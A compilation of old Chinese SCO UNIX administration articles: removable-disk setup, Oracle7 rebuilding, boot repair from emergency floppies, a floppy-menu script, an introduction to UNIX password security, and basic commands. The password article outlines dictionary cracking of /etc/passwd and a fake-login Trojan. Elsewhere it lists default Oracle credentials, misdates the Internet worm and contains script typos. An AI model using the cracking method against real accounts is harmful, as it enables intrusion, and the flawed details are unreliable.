---- 对 缺 省 引 导 问 题 回 答Yes， 对 重 新 建 立 内 核 环 境 问 题 回 答No。

---- 至 此， 系 统 中 就 有 了 活 动 硬 盘 的 设 备 名/dev/rdsk/ls0。

三、 初 始 化 活 动 硬 盘
---- 在 使 用 硬 盘 之 前， 必 需 对 硬 盘 分 区， 但 如 果 是 首 次 进 行 此 项 操 作， 则 不 能 直 接 用fdisk 命 令， 而 应 再 次 使 用mkdev 命 令：

---- #mkdev hd id host 0
---- id 和host 的 设 置 方 法 与 步 骤 二 一 致。

---- 这 时 会 出 现fdisk 菜 单， 根 据 实 际 情 况 对 硬 盘 分 区， 完 成 后 按q 键 退 出， 在 接 下 来 出 现 的divvy 菜 单 以 及 提 示 中， 直 接 按q 键 返 回。

---- 以 后 若 有 新 的 活 动 硬 盘 需 要 分 区， 就 可 以 直 接 使 用fdisk 命 令：

---- #fdisk /dev/rdsk/ls0
---- 然 后, 使 用mkfs 命 令 在 活 动 硬 盘 上 建 立 文 件 系 统：
---- #mkfs /dev/rdsk/ls0 YYYYYY:2000 1 80

---- YYYYYY 的 值 取 决 于 活 动 硬 盘 的 具 体 类 型。 以Iomega 系 列 硬 盘 为 例， 以 下 几 种 型 号 对 应 的YYYYYY 值 分 别 为：

Jaz 1Gig　　 - 2084864
Zip 100　　 - 196608
230MB　　 - 447280
150MB　　 - 294912
105MB　　 - 206856
1GB　　 - 452480
四、 将 活 动 硬 盘 挂 接 到 根 文 件 系 统
---- 一 旦 在 活 动 硬 盘 上 建 立 了 文 件 系 统， 就 可 以 通 过mount 命 令 将 它 挂 接 到 根 文 件 系 统：

---- #mount /dev/dsk/ls0 /mnt

---- 当 活 动 硬 盘 使 用 结 束 后， 在 从 驱 动 器 中 取 出 之 前， 必 需 使 用unmount 命 令：

---- #unmount /dev/rdsk/ls0

---- 参 照 以 上 的 步 骤， 即 可 在Unix 上 正 确 安 装Iomega 活 动 硬 盘。 对 于 其 他 品 牌 的 硬 盘， 只 需 对 部 分 参 数 作 一 些 改 动， 就 能 完 成 安 装

返回


SCO UNIX环境下重建Oracle7数据库

《一键清理系统垃圾》

SCO UNIX环境下重建Oracle7数据库

    ORACLE7安装成功之后便建有一数据库ora7或or71,如果自己做应用开发,则可能要重建 数据库或建一新的数据库以满足自己的需要,而ORACLE重建数据库不但要用SQL命令create database创建,还要指定大量的参数,如控制文件、日志文件、参数文件、数据库实例名。 并且要建立相关的系统段、回滚段、用户段等,及其对应的数据文件。其步骤如下:

    以oracle用户登录UNIX系统

    SCOSYSV!LOGIN:oracle

    备份后删除原数据库文件和控制文件

$cd ./dbs

$rm*.dbf

$rm*.ctl

$cd /*进入oracle用户目录*/

编辑文件.profile,在$ORACLE_HOME目录中(假设为/u/oracle)

$vi .profile

#插入以下各行,设置环境变量

ORACLE_HOME=/u/oracle;export ORACLE_HOME

TK2DEV=ANSI

#ORACLE_SID是库实例名,建议四个字母或数字

ORACLE_SID=olib

PATH=/usr/bin:/u/bin:/u/sbin:$ORACLE_HOME/bin

exprot TK2DEV

exprot ORACLE_SID

exprot PATH

:wq! 存盘退出

进入ORACLE_HOME/dbs目录设置参数文件

$cd ./dbs

编辑init$ORACLE_SID.ora文件

$cp init.ora initolib.ora #用原始的初始化文件设置

$cp init_0.ora initolib_0.ora #原始的初始化文件用于create database

$vi initolib_0.ora

#设置参数文件

#ifile=$ORACLE

_HOME/dbs/config

$ORACLE_SID.ora

ifile =/u/oracle/dbs/configolib.ora

rollback_segments =( ) #先设回滚段为空,在initolib.ora中为#(r01,r02,r03,r04

:qw!存盘退出

编辑config$ORACLE_SID.ora文件

$vi configolib.ora

# 设置控制文件

control_files=(/u/oracle/dbs/ctr1olib.ctl #三个控制文件最好

/u/oracle/dbs/ctr2olib.ctl,#放在不同目录或

/u/oracle/dbs/ctr3olib.ctl)#磁盘上

db_block_size=2048 #可自行确定

db_name=olib #设置数据库名

:wq! 存盘退出

编辑建库SQL命令文件

$cd ./dbs

$cp crora7.sql crolib.sql #用原始的SQL文件编辑

$cp cr2ora7.sql cr2olib.sql #用原始的SQL文件编辑

$vi crolib.sql

set termout on

set echo on

spool/u/oracle/dbs/crolib.lst /*输出到文件crilib.lst*/

connect internal /*dba连接到internal*/

/*用参数文件initolib_0.ora启动数据库实例,但不安装实例*/

startup nomount pfile=/u/oracle/dbs/initolib_0.ora

create database"olib" /*数据库名*/

maxinstances 1 /*可同时打开数据库实例的最大值*/

maxlogfiles 16 /*可建的日志文件组的最大值*/

datafile /*指定用于SYSTEM表空间的数据文件*/

`/u/oracle/dbs/systolib.dbf' size 25M

logfile /*指定日志文件,最好放在不同磁盘上*/

`/u/oracle/dbs/log1olib.dbf' size 500k,

`/u/oralce/dbs/log2olib.dbf' size 500k,

`/u/oracle/dbs/log3olib.dbf' size 500k;

disconnect

spool off

＜EOF:＞

编辑建数据字典与表空间SQL命令文件

$vi cr2olib.sql

…/*由于文件较大,未录。需要者请与作者联系*/

开始建库

重新以ORACLE用户登录,让.profile文件起作用.

$cd ./dbs /*进入/dbs目录*/

$sqldba mode=line /*以行命令方式启动DBA工具*/

SQLDBA＞@CROLIB.SQL /*执行建库SQL命令文件/

SQLDBA＞@CR2OLIB.SQL /*执行建数据字典SQL命令文件*/

SQLDBA＞EXIT

$

此时已建立数据库olib,并建用户sys/change_on_install和sys-tem/manager

如需创建其他用户可以用system用户进入SQLDBA后

SQLDBA＞CREATE USER MYUSER IDENTIFIED BY MYPAS-WORD

DEFAULT TABLESPACE USERS

TEMPORARY TABLESPACE TEMP

QUOTA UNLIMITED ON USERS

QUOTA 5M ON SYSTEM

QUOTA 5M ON TEMP

;

再授予用户特权

SQLDBA＞GRANT DBA TO MYUSER;

这样重建数据库的过程就全部完成,之后就可以建立表空间和自己设计的表进行开发或 应用了。

如想用原命令$dbstart启动新的数据库只要修改文件oratab即可。

$vi /etc/oratab

olib :/u/oracle:Y /*第一个参数为数据库名,

第二个参数为$ORACLE_HOME路径,

第三个参数为自定义$ORACLE_SID库名,即第

一个参数的存在情况是Yes.

*/

:wq! /*存盘退出*/

这样就可用$dbstart启动了。

返回


SCO UNIX环境下自动增加网关的两种方法

《一键清理系统垃圾》

SCO UNIX环境下自动增加网关的两种方法

    为使局域网上的UNIX主机能访问上级行及各地市分 行的局域网,需要增加网关,一般手工方法是使用route命令。笔者在实际应用中,发现有 两种方法可实现UNIX系统启动时自动增加网关。

方法一:编辑产生一个/etc目录下的gateways文件。

以root注册。

#cd /etc

#vi gateways

在该文件中增加以下语句:

net目的网络gateway网关地址metric value [passive/active]

    其中Value表示一个到达目的网络所经过的路程段的数目即跳数。passive,active表示 网关为被动的或主动的。例如,笔者单位局域网上的unix主机要访问上级行100.88.1.0局域 网段,可用如下语句:

net 100.88.1.0 gateway 100.88.198.1 metric 2 passive

    其中100.88.198.1是本单位路由器的局域网IP地址。同样要访问别的分行的局域网可按 上述方法增加相应的语句。

    方法二:编辑产生一个/etc/rc2.d目录下以大写S开头的文件如S96gateway。

    我们知道,在UNIX中有几种运行级,如运行级0表示系统停机状态,运行级1表示系 统管理状态,运行级2是系统常规运行级即多用户状态,而每个运行级都对应一个/etc/rcn .d目录。如运行级2对应/etc/rc2.d目录,这个目录包含一些shell文件,unix系统启动进入 多用户状态自动执行这些文件中的命令,而且这些shell文件名具有如下格式:Snnname。S 表示系统进入这个运行级需执行该文件以启动文件中指定的进程;nn是一个00-99的数字, 该数字是这个进程被启动的顺序号;name文件名,根据这一特点,我们可以编辑产生一个文 件如S96gateway达到机器启动自动加入网关的目的。

以root注册。

#cd /etc/rc2.d

#vi S96gateway

在该文件中,增加以下语句:

route add net目的网络　网关地址　跳数

如前例为访问100.88.1.0网段,上述语句为:

route add net 100.88.1.0 100.88.198.1 2

    其中100.88.198.0是本单位路由器IP地址。访问不同的网络,可相应增加对应的语句。 如果局域网上仅有一个路由器,可指定其为缺省网关,方法是在S96gateway中加入:

route add default 网关地址 1

    如路由器地址为:100.88.198.1上述语句就是:

route add default 100.88.198.0 1

上述方法在sco open server network system release 3.0.0操作系统及compaq desk pro 466机器上使用通过。

返回


SCO UNIX系统故障特征、分析及解决

《一键清理系统垃圾》

SCO UNIX系统故障特征、分析及解决

    SCO UNIX系统在我国的银行、证券、税务、铁路、商业等企事业单位广泛地使用。在 维护UNIX系统时应规范操作,以确保系统的正常运行,如果系统受损,比如误删某个系统文件 致使系统无法启动,这时如果采取重新安装系统的方法,势必造成用户数据的丢失,而且,重 新安装UNIX操作系统和应用软件及调试运行往往要花上好几个小时的时间。能否有办法呢 ?笔者通过反复探索和实践,找到了既能以较快的速度修复损坏的系统又能保证数据完好无 损的方法,即事先制作应急引导软盘,当系统损坏(比如系统无法正常引导、 超级用户口令 遗忘等)时,用该软盘进行修复(已经有同行介绍过通过制作应急引导软盘修复SCO XENIX系 统的方法,但在UNIX与SCO XENIX下应急引导软盘的制作及使用有很大的区别),现将该方法 介绍出来,供大家参考。

    我们首先来制作UNIX应急引导软盘, 方法如下:

    在超级用户提示符#下敲入:mkdev fd并回车,屏幕上将出现菜单选项如下:

    1.48tpi, double sided, 9 sectors per track

    2.96tpi, double sided, 15 sectors per track

    3.135tpi, double sided, 9 sectors per track

    4.135tpi, double sided, 18 sectors per track

    因为我们是用1.44MB软盘制作应急引导盘, 故选择4,又因为我们的启动驱动器为1.44 MB的软驱(下同), 所以当出现:Do you want to use floppy drive0 or floppy disk 1?时 选择0, 这时屏幕上出现菜单选项:

    1.Filesystem

    2.Bootable only (96ds15 and 135ds18 only)

    3.Root filesystem only (96ds15 and 135ds18 only)

    我们先选择2制作应急引导盘的可启动软盘(以下简称Boot盘),当把软盘插入驱动器后 将提示是否需要格式化软盘,这里可按需要进行选择,然后系统将自动在软盘上建立文件系 统,并将一些文件拷贝到软盘上,文件拷贝完后将自动对软盘上的文件系统进行检查,无误后 又将出现上面的菜单选项,我们再选择3制作应急引导盘的根文件系统软盘(以下简称Root盘 ),同样我们可按需要选择是否首先对软盘进行格式化,然后系统亦首先在软盘上建立文件系 统,并将一些文件及特别文件拷贝到软盘上,文件拷贝完后也将自动对软盘上的文件系统进 行检查,无误后仍将又回到上面的菜单选项,至此,UNIX应急引导盘的Boot盘及Root盘制作完 成,我们选择q退出到超级用户提示符#下。

    由于应急引导盘的Boot盘及Root盘均是通过建立文件系统形成的, 所以我们要查看或 修改上面的内容必须先用命令mount将其安装到硬盘的某个空目录(如/mnt)上,待所做的工 作完成后再用命令umount卸下来即可。

    在这里,我们先将后面要用到的命令及意义说明如下:

    ①安装已建立文件系统的软盘到硬盘的空目录/mnt下

mount /dev/fd0135ds18 /mnt

    ②卸下已安装到硬盘的软盘

cd /

umount /dev/fd0135ds18

    ③安装硬盘到已建立文件系统的软盘的空目录/mnt下

mount /dev/hd0root /mnt

    ④卸下已安装到软盘的硬盘

cd /

umount /dev/hd0root

    ⑤检查与收复可能受到损坏的文件系统

    对硬盘的根文件系统, 若是用应急引导盘启动则为:

fsck /dev/hd0root

    对硬盘的根文件系统, 若是由硬盘自身启动后则为:

fsck /dev/root

    对软盘的文件系统为:

fsck /dev/fd0135ds18

    要注意的是, 以上命令中mount及umount 只有在超级用户提示符下才能执行。下面分 析几种系统不能正常引导故障及解决办法。

    故障之一

    当打开计算机电源后,主控台屏幕上出现如下信息:

boot not found

cannot open

    Stage 1 boot failure: error loading hd(40)/boot然后死机, 这表明系统根目录下 的boot文件丢失。boot是用于装载并执行UNIX程序的交互式程序, 主要用于装载和执行UN IX操作系统的核心, 在引导过程中boot将读/etc/default/boot, 显示引导过程信息, 装入 并执行/unix, 所以当boot文件受损时将导致系统引导失败。我们可通过如下步骤用应急引 导盘恢复系统:

    1.将Boot盘插入驱动器并重新对机器加电, 此时由Boot盘开始引导;

    2.在系统引导提示下敲入hd(40)/unix, 这个命令用于从硬盘把UNIX核心装入, 然后输 入root口令进入单用户模式, 此时出现超级用户提示符#;

    3.用命令①把Boot盘安装到硬盘上, 然后用命令: cp /mnt/boot/恢复硬盘根目录下的 boot文件;

    4.用命令②把Boot盘从硬盘上卸下来;

    5.敲入haltsys关闭系统, 然后再取出Boot盘, 则故障排除, 系统可正常引导;

    6.在系统正常引导后进入超级用户, 将/boot文件的属主和组均改为系统原来所定义的 bin即可。

    故障之二

    机器加电后, 主控台屏幕出现如下信息:

unix not found

    然后死机, 这表明UNIX核心丢失, 因为/unix包含核心, unix文件受损将导致系统无 法装入并执行内核, 从而出现死机。我们可用如下方法来恢复:

    1.将Boot盘插入驱动器并重新对机器加电, 此时由Boot盘开始引导;

    2.在系统引导提示下敲入:fd(64) unix root=hd(40) swap=hd(41) pipe=hd(40)或仅 敲入fd(64)/unix亦可, 这个命令用于从Boot盘把UNIX核心装入,然后输入root口令进入单 用户模式, 此时出现超级用户提示符#;

    3.用命令①把Boot盘安装到硬盘上, 然后用命令: cp /mnt/unix/恢复硬盘根目录下的 unix文件;

    4.用命令②把Boot盘从硬盘上卸下来;

    5.敲入haltsys关闭系统, 取出Boot盘, 则故障排除,系统可以正常引导;

    6.在系统正常引导后进入超级用户, 将/unix文件的属主和组改为系统原来所定义的bin和mem即可。

    故障之三

    机器加电后在系统引导提示符下敲入回车键, 当第一屏被刷新后在第二屏的最后一行 出现如下信息:

    Kernel: i/o bufs=600k 然后系统挂起, 这表明系统上/etc/init文件丢失。 因为i nit程序在核心初始化的最后阶段开始执行, 其进程号(pid)为1。 该进程按一定规则启动 /etc/inittab文件中所列的进程, 引导系统进入所规定的运行级别。 它首先读/etc/init tab中的initdefault项,当所有的进程都创建成功后, init进入循环等待, 它主要用于打开 主控台/etc/console, 检查文件系统的一致性, 执行/etc/rc 进行必要的设置。 init在单 用户模式下启动shell,而在多用户模式下运行/etc/brc, /etc/bchk等外壳程序并启动/et c/rc, 它调用/etc/getty为每个终端生成一个getty进程, 以便在读入用户注册名后完成用 户的注册过程。如果/etc/init文件受损,新的进程就无法创建, 从而导致系统挂起, 我们 可用如下方法恢复系统:

    1.将Boot盘插入驱动器并重新对机器加电, 此时由Boot盘开始引导, 在系统引导提示 符下按回车键, 然后在提示插入Root盘时取出Boot盘并将Root盘插入, 这样系统全部由应 急引导盘引导, 直至出现提示符#;

    2.用命令③把硬盘安装到软盘上;

    3.把/etc/init文件从软盘上拷贝到所安装的硬盘上:cp /etc/init /mnt/etc/init

    4.用命令④把硬盘从软盘上卸下来;

    5.用命令haltsys关闭系统后把Root盘取出, 此时系统已可正常引导;

    6.在系统正常引导后进入超级用户, 将/etc/init文件的属主与组均改为系统原来所定 义的bin即可。

    故障之四

    机器加电后在系统引导提示符下敲入回车键, 当第一屏被刷新后到第二屏时即出现许 多错误信息, 如:

INIT: command

exec /etc/brc 1＞/dev/console 2＞&1

failed to execute, errno=9 (exec of shell failed)

...

    等等, 并不断翻屏显示出错信息, 这表明系统/bin/sh文件受损或丢失。因为sh是SH ELL标准、作业控制和限制性命令解释程序。 所以, 该文件受损或丢失将导致系统启动失 败。我们可用如下步骤解决:

    1.将Boot盘插入驱动器并重新开启电源,在系统引导提示符下敲入按回车键, 当提示插 入Root盘时把Boot取出并将Root盘插入, 这样系统全部由应急引导盘引导, 直到出现提示 符#;

    2.用命令③把硬盘安装到软盘上;

    3.把/bin/sh文件从软盘上拷贝到所安装的硬盘上: cp /bin/sh /mnt/bin/sh

    4.用命令④把硬盘从软盘上卸下来;

    5.用命令haltsys关闭系统后将Root盘取出, 此时系统已可以正常引导;

    6.在系统正常引导后进入超级用户下, 将文件/bin/sh的属主与组均改为系统原来所定 义的bin即恢复了系统。

    故障之五

    系统可以引导, 但在引导时会出现如下错误信息:

su: Unknow id: root

...

INIT: SINGLE USER MODE

**** PASSWORD FILE MISSING!****

Entering System Maintenance Mode

    然后系统自动进入系统维护模式即单用户模式并出现提示符#, 这样系统就无法进入 多用户模式工作。当在系统自动进入单用户模式后, 我们若用命令ls -l进行文件的长列表 显示时会首先出现一行: /etc/passwd cannot be opened for reading, 然后再给出文件 的长列表, 但长列表中文件属主原为bin的已全部自动改为0,1,2,3...等等。这表明文件/ etc/passwd受损或丢失, 因为系统加载时要进行工作方式(单用户或多用户方式)的选择, 此时系统会自动在/etc子目录下寻找passwd文件, 若找不到则自动进入到单用户模式。解 决这一问题的方法如下:

    1.在系统自动进入单用户模式后, 用命令①把应急引导盘的Root盘安装到硬盘上;

    2.把/etc/passwd文件从软盘上拷贝到所安装的硬盘上:cp /mnt/etc/passwd /etc/ passwd

    3.用命令②把软盘从硬盘上卸下来;

    4.将Root盘取出,用命令reboot重新启动系统,此时系统已可以正常引导;

    5.在系统正常引导后进入超级用户下,将文件/etc/passwd的属主与组分别改为系统原 来所定义的bin和auth即可(这里很有意思的是, 我们倘若再用命令ls-l进行文件的长列表 显示时, 上述的现象已不见了,长列表中文件属主原为bin的已全部自动改回为bin)。

    故障之六

    如果计算机中没有387浮点协处理器, 且在引导时出现警告信息:

WARNING: cannot load floating point emulator

    然后引导失败, 这表明系统文件/etc/emulator丢失。 因为文件/etc/emulator用于仿 真计算机中的387浮点协处理器, 我们可用如下方法恢复:

    1.将Boot盘插入驱动器并对机器重新加电, 此时由Boot盘开始引导, 在系统引导提示 符下按回车键,在提示插入Root盘时取出Boot盘并将Root盘插入,这样系统全部由应急引导 盘引导, 直到出现提示符#;

    2.用命令③把硬盘安装到软盘上;

    3.把/etc/emulator文件从软盘上拷贝到所安装的硬盘上: cp /etc/emulator /mnt/ etc/emulator

    4.用命令④把硬盘从软盘上卸下来;

    5.用命令haltsys关闭系统, 然后把Root盘取出,此时系统已可正常引导;

    6.在系统正常引导后进入超级用户, 将/etc/emula-tor文件的属主与组均改为系统原 来所定义的bin即可。

    故障之七

    系统可以引导, 亦能正常处理日常事务, 但每当关机时总会在主控台屏幕上出现错误 信息:

/etc/initscript: /etc/uadmin: not found

    然后系统死机,从而导致系统不能正常关机,这样每次系统在启动时都需要清理文件系 统, 不仅浪废时间还可能严重破坏文件系统导致系统瘫痪。

    造成上面的故障是由于系统文件/etc/uadmin丢失或损坏所致, 可用如下方法排除:

    1.在系统引导并清理文件系统完成后, 以超级用户root注册(进入单用户模式亦可);

    2.在超级用户提示符#下, 用命令①把Root盘安装到硬盘上;

    3.把/etc/uadmin文件从软盘上拷贝到所安装的硬盘上:cp/mnt/etc/uadmin /etc/uad min

    3.用命令②把软盘从硬盘上卸下来, 然后把Root盘取出;

    4.将文件/etc/uadmin的属主与组分别改为系统原来所定义的bin, 至此,故障排除, 系 统可正常关机。

    故障之八

    当系统管理员遗忘了超级用户口令时也是一件非常令人棘手的事。我们知道, UNIX超 级用户拥有对系统至高无上的控制权, 很多命令, 特别是对系统的管理与维护只有超级用 户才能执行。 我们可用如下方法解决这一问题:

    1.在UNIX系统的超级用户口令为回车键(或自己确认不会忘记的口令) 时按上面介绍的 方法制作应急引导盘, 制作完后再将Root盘插入软驱, 用命令①把Root盘安装到硬盘上, 然后用命令: cp/tcb/files/auth/r/root/mnt/root将包含有超级用户口令变形码的文件/ tcb/files/auth/r/root拷贝到Root盘上,然后用命令②将Root盘卸下来并把它们保存在安 全的地方;

    2.当超级用户口令遗忘时, 将Boot盘插入驱动器并对机器重新加电,此时由Boot盘开始 引导, 在系统引导提示符下按回车键, 在提示插入Root盘时取出Boot盘并将Root盘插入, 这样系统全部由应急引导盘引导, 直到出现提示符#;

    3.用命令③把硬盘安装到Root盘上;

    4.把root文件从Root盘上拷贝到硬盘的/tcb/files/auth/r目录下:cp/root/mnt/tcb/ files/auth/r/root

    5.把/etc/passwd文件从Root盘上拷贝到硬盘的/etc/passwd目录下: cp/etc/passwd/ mnt/etc/passwd

    6.用命令④把硬盘从软盘上卸下来;

    7.用命令haltsys关闭系统, 然后把Root盘取出;

    8.在系统正常引导后以超级用户root注册, 在要求输入口令处直接按回车键(或输入在 制作应急引导盘时自己专门设置的超级用户口令)即可进入超级用户, 然后将文件/etc/pa sswd的属主与组分别改为系统原来所定义的bin和auth, 将文件/tcb/files/auth/r/root的 属主与组分别改为系统原来所定义的root和auth, 最后用passwd重新设置超级用户口令即 可。

    上面介绍的方法,经在SCO UNIX Release 3.2 V4.2、Compaq系列服务器及微机、 AST系列服务器及微机、DECpc和金山系列微机上调试通过。

    注意的问题

    1.上述的操作中, 如果出现文件系统安装不上(硬盘不能安装到软盘上或软盘不能安 装到硬盘上), 表明硬盘的根文件系统或软盘的文件系统受到了损坏, 我们可以依情况选用 ⑤提供的三条命令之一进行修复后再行安装;

    2.当把硬盘安装到软盘上或把软盘安装到硬盘上后, 在把它们卸下来之前, 请不要取 出软盘或关闭系统, 否则, 硬盘的根文件系统或软盘的文件系统将受到损坏, 甚至可能导 致不能修复。

返回


SCO UNIX下磁盘设备的应用管理

《一键清理系统垃圾》

SCO UNIX下磁盘设备的应用管理

    UNIX下的文件系统与DOS完全不同,它对于磁盘文件的操作应用非常复杂,常常以长而难 记的命令行为代价,不便于使用。在磁盘管理中,如要格式化文件系统、构造文件系统、挂装 文件系统、下装文件系统、显示软盘系统参数、将硬盘数据备份至软盘、将软盘信息恢复至 硬盘,这都是系统管理员常做的。为使用方便,笔者书写了一个shell程序,将各项命令都纳入 菜单,从而避免了复杂命令行的麻烦。程序在SCO UNIX系统下调试通过。

￥cat menu,sh＜Enter＞ /*显示菜单程序MENU,SH清单*/

;

#程序名;MENU,SH

# SCO UNIX环境下的软盘管理工具

#

PATH=/bin;/usr/bin;

true=0

while test ￥ true=0

do

clear

echo "\n\n\n\n\n"

echo"

** SCO UNIX环境下的软盘管理工具**

1.软盘格式化(format)

2.构造文件系统(mkfs)

3.安装软盘(mount)

4.拆卸软盘(umount)

5.显示软盘信息

6.将硬盘信息拷贝至软盘

7.将软盘信息拷贝至硬盘

0.退出

etho" 请选择(0,1—7):\c"

read choice

clear

if test ￥choice -eq 0

then clear

echo"\n\n\n\n\n"

exit 0

fi

getyn() /*shell函数*/

{

while echo"￥*继续吗!请回答(y/n)?\c"

do read yn rest

case ￥yn in

[yY])return 0;;

[nN])return 1;;

*)echo"******请回答(y或n)!!!";;

esac

done

}

fy() /*shell函数*/

{

echo请输入你的软盘规格:\(0-代表A驱动器\)\(1-代表B驱动器\);"\c"

read floppy

if test ￥ floppy -eq 0

then DEVICE=/dev/rfd0135ds18

FD=A

else DEVICE=/dev/rfd196ds15

FD=B

fi

}

case ￥ choice in

1) fy

clear

while

getyn

do

format ￥ DEVICE

done;;

2)echo 您的软盘规格是\(0-代表1.44MB\)\(1-代表1.2MB\);"\c"

read floppy

if test ￥ floppy-eq 0

then /etc/mkfs/dev/rfd0135ds18 1440

echo"******软盘文件系统构造成功!!"

sleep 3

else /etc/mkfs/dev/rfd196ds15 1200

echo"******软盘文件系统构造成功!!"

sleep 3

fi;;

3) echo 您的软盘规格是\(0-代表1.44MB\)\(1-代表1.2MB\);"\c"

read floppy

if test ￥ floppy -eq 0

then echo "软盘已成功地挂接在/usr/jn下,即可将子目录/usr/jn当作软盘进行操作 。"

echo"用户注意:软盘安装后,在没有拆卸之前,不要将软盘取出!"

sleep 3

/etc/mount/dev/fd0/usr/jn

/etc/mount

sleep 3

else echo"软盘已成功地挂接在/usr/jn下,即可将子目录/usr/jn当作软盘进行操作 。"

echo"用户注意:软盘安装后,在没有拆卸之前,不要将软盘取出!"

sleep 3

/etc/mount /dev/fd1/usr/jn

/etc/mount

sleep 3

fi ;;

4)echo 请输入你的软盘规格:\(0-代表A驱动器\)\(1-代表B驱动器\):"\c"

read floppy

if test ￥ floppy -eq 0

then DEVICE=/dev/fd0

FD=A

else DEVICE=/dev/fd1

FD=B

fi

/etc/umount ￥ DEVICE

if test ￥!-eq 0

then echo"******软盘已经拆卸!!你现在可以取出软盘!"

sleep 3

fi;;

5)fy

echo 请将软盘插入￥FD驱动器中!并关好门!……

echo

sleep 2

tar tvf ￥DEVICE

sleep 5;;

6)while getyn

do

clear

echo 现在的工作路径是:'pwd'

echo 输入待拷贝的路径和文件名\(如:\/usr\/bd1996\):"\c"

read file

fy

echo 正在拷贝,请稍候……

tar uvf ￥DEVICE ￥file

done;;

7)while getyn

do

echo " 用户注意:从软盘中读入指定的文件时,必须一个文件一个文件地"

echo "指定,不能使用通配符!!!"

fy

echo 请将软盘插入　￥FD驱动器中!

tar tvf ￥DEVICE

echo 请输入软盘中待读入的文件名:"\c"

read file

echo 正在读盘,请稍候……

tar xvf ￥DEVICE ￥file

echo" ****拷贝完成!!!"

sleep 2

clear

done;;

esac

done

￥sh-v menu.sh＜Enter＞ /*对shell程序的全部执行过程进行跟踪*/

￥chmod u+x menu.sh＜Enter＞

返回


UNIX 口令安全简介

《一键清理系统垃圾》

UNIX 口令安全简介

    由于UNIX是Internet最流行的服务器操作系统，因此它的安全性倍受关注。而这种安全主要靠口令实现。UNIX的口令仅仅存储在一个加密后的文本文件中，文件一般储存在/etc目录下，名称为passwd。历史上，UNIX口令加密算法曾经历过几次修正，现在普遍采用DES算法。用DES算法对口令文件进行25次加密。而对每次DES加密产生的结果，都要用2的56次方次查找才能进行一次遍历，所以理论上要破解这样的口令，其工作量是不可想象的。
    但是，在口令的设置过程中，却有许多其它个人因素在起作用，许多人就是利用这些因素来解密的。由于口令安全性的考虑，人们会被禁止把口令写在纸上，因此很多人都设法使自己的口令容易记忆，而这就给黑客提供了可乘之机。
    贝尔实验室的计算机安全专家R.Morris和K.Thompson提出了这样一种攻击的可能性：可以根据用户的信息建立一个他可能使用的口令的字典，比如：他父亲的名字、女朋友的生日或名字，街道的名字等等。然后对这个字典进行加密，每次拿出一个经过加密计算的条目与口令文件比较，若一致，口令就被猜到了。
    一般说来，这种攻击策略是很有效的，请想问一下自己：你的口令是否与身边的某些东西有关呢？
    事实上，在得到某人的个人资料后，整个破译过程只需一个简单的C程序即可完成。比如：
    有一组子程序可对/etc/passwd文件进行方便的存取，可读取文件到入口项或写入新的入口项等等。
    getpwuid()函数即可从/etc/passwd文件中获取指定的UID的入口项。getpwnam()函数则对于指定的登录名，在/etc/passwd文件检索入口项。
    以上两个子程序返回一指向passwd结构的指针，该结构定义在/usr/include/pwd.h中，定义如下:

struct passwd {
char * pw_name; /* 登录名 */
char * pw_passwd; /* 加密后的口令 */
uid_t pw_uid; /* UID */
gid_t pw_gid; /* GID */
char * pw_age; /* 代理信息 */
char * pw_comment; /* 注释 */
char * pw_gecos;
char * pw_dir; /* 主目录 */
char * pw_shell; /* 使用的shell */
char * pw_shell; /* 使用的shell */
};

    getpwent()，setpwent()，endpwent()等函数则可对口令文件作后续处理。
    首次调用getpwent()，可打开/etc/passwd文件并返回指向文件中第一个入口项的指针，并保持调用之间文件的打开状态，再调用getpwent()便可顺序地返回口令文件中的各入口项。而调用setpwent()又可把口令文件的指针重新置为文件的开始处，最后使用完口令文件后调用endpwent()可关闭口令文件。
    所以，攻击者只需建立一个字典文件，然后调用现成的DES加密例程来加密字典文件中的每一条目，再用上述函数打开口令文件，进行循环比较就很容易得到破获到密码。
    人们记忆犹新的1998年11月2日因特网蠕虫，就是用这种方法来破密的。
    当然，很多当代的UNIX系统都针对这种进攻策略采取了相应的防范措施，比如将口令与用户信息分开存放，限制用户登录的尝试次数等。
    相对与此，现在还出现了另一些窃取口令的方法，其中之一就被叫做特洛伊木马。比如，你可能在你的终端上发现如下信息：Please enter your user name to logon:Your password:
    然后，你就老老实实的输入了你的口令。殊不知，这很可能是一个模仿登录信息的特洛伊木马程序，他会记录你的口令，然后传给入侵者。

返回


UNIX 作业系统操作简介

《一键清理系统垃圾》

UNIX 作业系统操作简介

  UNIX 是个多人多工作业系统。另外，UNIX 有很多种，如 AT&T UNIX (SVR4)、

SunOS 4.1.3、HP-UX R8、AIX V3、 XENIX、Linux 等等，国内学校工作站以使用SunOS 为主流，各系统大同小异，以下介绍其基本指令的操作。

○ 第一节 命令格式 ○
命令 [选项] [处理对象]
例: ls -la mydir
□ 命令一般是小写字串，注意大小写有别。
□ 选项通常以减号(-)再加上一个或数个字元表示，用来选择一个命令的不同操作
□ 同一行可下数个命令，命令间应以分号隔开。
□ 命令之後加上 & 可使该命令背景执行。
⊙ 一般在 shell 下执行程式，我们必须等刚下过的指令执行结束後，才能继续下指令，这就是前景执行，如果程式执行时间太长，不想等待它，可将该程式放至背景执行，此时就可继续做别的事了。
□ UNIX 命令列有不少保留字，如 "\", "&", "|", ">", "<", "(", ")", "/","!", "$", "*", "'" 等，这些字元均有特殊解译，如果命名或参数要用到保留字，请在保留字之前加上反斜线 "\"，例如 \! 代表 !， \\ 代表 \ 。
□ 线上求助指令 -- man 可在线上用来查询各种命令用法(manual page)的指令例∶man ls 查询 ls 这个指令的用法man man 查询 man 指令的用法以下大部份指令仅列简要说明，详细用法可用 man 查询。为节省篇幅，举例不多，读者需时常上机使用才能真正熟悉指令的用法。
○ 第二节 档案及目录指令 ○
□ 和 DOS 相似，UNIX 采用阶层式目录管理结构，由根目录( / )开始一层层将子
目录建下去，各阶层目录以 / 隔开。
□ home directory∶使用者 login 时，工作目录的位置，是由系统管理者所设定
□ "~" 符号代表自己的 home directory，例如 ~/myfile 是指自己 home 目录下
myfile 这个档案；~b82000/bin/qkmj 代表 b82000 的 home 目录下， bin 目
录内 qkmj 档案。
□ 档名有区分大小写，长度可达 256 字元 (随系统而异)，且不限点号(.)的数目
□ 隐藏档∶档名或目录名以 . 开头即为隐藏档。
□ . 表示目前所在目录
.. 表示上一层目录
□ UNIX 的万用字元有三种，'*' 和 '?' 用法和 DOS 相同，另可用 [....]
代表区间内的任一字元，如 test[0-5] 即代表 test0, test1, ...,test5
的集合。
□ 以下是 ls -l 指令输出的例子，分别介绍各栏位的意义
total 63
drwx------ 4 b1503045 1536 Feb 13 16:37 Mail
drwx------ 2 b1503045 512 Jan 9 16:26 News
